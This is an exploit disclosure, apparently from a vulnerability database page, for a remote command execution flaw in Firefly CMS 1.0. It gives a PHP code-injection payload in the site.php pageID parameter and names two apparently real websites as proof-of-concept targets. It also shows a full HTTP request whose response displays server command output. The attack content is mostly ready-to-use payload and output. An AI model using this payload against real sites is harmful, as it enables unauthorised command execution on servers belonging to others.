Firefly CMS 1.0 Remote Command Execution

2019.05.13
Credit: Felipe Andrian Peixoto
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

[+] Remote Comand Execution on Firefly CMS v. 1.0 [+] Date: 11/05/2019 [+] CWE number: CWE-78 [+] Risk: High [+] Author: Felipe Andrian Peixoto [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Windows 7 and Linux [+] Vendor Homepage: https://fireflydigital.com/ [+] Vulnerable File: site.php [+] Version : 1.0 [+] Exploit: http://host/patch/site.php?pageID={${system(%27id%27)}} [+] PoC: https://www.volalaw.com/site.php?pageID={${system(%27id%27)}} https://www.beltsforanything.com/site.php?pageID={${system(%27id%27)}} [+] Example Request: GET /site.php?pageID={${system(%27id%27)}} HTTP/1.1 Host: www.volalaw.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: keep-alive Upgrade-Insecure-Requests: 1 <html> <head> <title></title> <meta http-equiv="Content-Type" content="text/html;"> <link rel="stylesheet" href="bug.css" type="text/css"> </head> <body text="#000000" bgcolor="#F6EEE1" link="#008080" vlink="#808080" alink="#000080" background="templates/images/bkgd.jpg"> <table border="0" width="100%" cellspacing="0" cellpadding="0" align="center"> <tr valign="top"> <td class="body_links">uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0 </td> </tr> </table> </body> </html> [+] More About : http://cwe.mitre.org/data/definitions/78.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top